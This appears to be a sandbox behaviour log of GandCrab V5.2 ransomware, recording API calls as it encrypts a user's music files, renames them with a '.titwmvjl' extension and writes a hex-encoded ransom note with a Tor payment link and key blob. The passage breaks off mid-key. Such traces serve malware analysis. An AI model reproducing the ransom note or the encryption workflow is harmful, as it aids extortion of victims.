VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.268] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.268] lstrcmpW (lpString1="u-oADGwEFEJixX.wav", lpString2=".") returned 1 [0093.268] lstrcmpW (lpString1="u-oADGwEFEJixX.wav", lpString2="..") returned 1 [0093.268] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="u-oADGwEFEJixX.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav" [0093.268] lstrlenW (lpString=".titwmvjl") returned 9 [0093.268] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav") returned 46 [0093.268] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.269] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav.titwmvjl") returned 55 [0093.269] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav") returned 46 [0093.269] lstrlenW (lpString=".wav") returned 4 [0093.269] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.269] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0093.269] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0093.269] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.269] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav") returned 46 [0093.269] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav") returned 46 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="desktop.ini") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="autorun.inf") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="ntuser.dat") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="iconcache.db") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="bootsect.bak") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="boot.ini") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="ntuser.dat.log") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="thumbs.db") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="ntldr") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="NTDETECT.COM") returned 1 [0093.269] lstrcmpiW (lpString1="u-oADGwEFEJixX.wav", lpString2="Bootfont.bin") returned 1 [0093.270] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav") returned 46 [0093.270] lstrlenW (lpString=".wav") returned 4 [0093.270] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.270] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.270] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.270] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.270] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\u-oadgwefejixx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0093.270] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.270] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0093.271] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.271] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0093.272] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.272] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.272] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.272] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0093.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.272] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.272] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.273] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0093.273] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.273] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.273] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.273] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0093.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.274] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.274] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.274] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0093.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.274] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503338) returned 1 [0093.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.275] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0093.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.275] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0093.275] GetLastError () returned 0x0 [0093.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.275] CryptDestroyKey (hKey=0x503338) returned 1 [0093.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.275] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.275] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0093.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.276] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503478) returned 1 [0093.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.276] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0093.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.276] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0093.277] GetLastError () returned 0x0 [0093.277] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.277] CryptDestroyKey (hKey=0x503478) returned 1 [0093.277] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.277] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.277] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.277] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.278] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xec8a, lpOverlapped=0x0) returned 1 [0093.289] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff1376, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.289] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xec8a, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xec8a, lpOverlapped=0x0) returned 1 [0093.291] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.291] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0093.292] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.297] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.297] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.297] CloseHandle (hObject=0x2ac) returned 1 [0093.298] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\u-oadgwefejixx.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\u-oADGwEFEJixX.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\u-oadgwefejixx.wav.titwmvjl"), dwFlags=0x1) returned 1 [0093.298] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.299] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.299] lstrcmpW (lpString1="VpI4NfJ", lpString2=".") returned 1 [0093.299] lstrcmpW (lpString1="VpI4NfJ", lpString2="..") returned 1 [0093.299] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="VpI4NfJ" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ" [0093.299] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\" [0093.299] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.299] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.299] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.300] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.300] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.300] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.300] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.300] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.301] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.301] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\\\TITWMVJL-DECRYPT.txt") returned 57 [0093.301] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0093.301] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30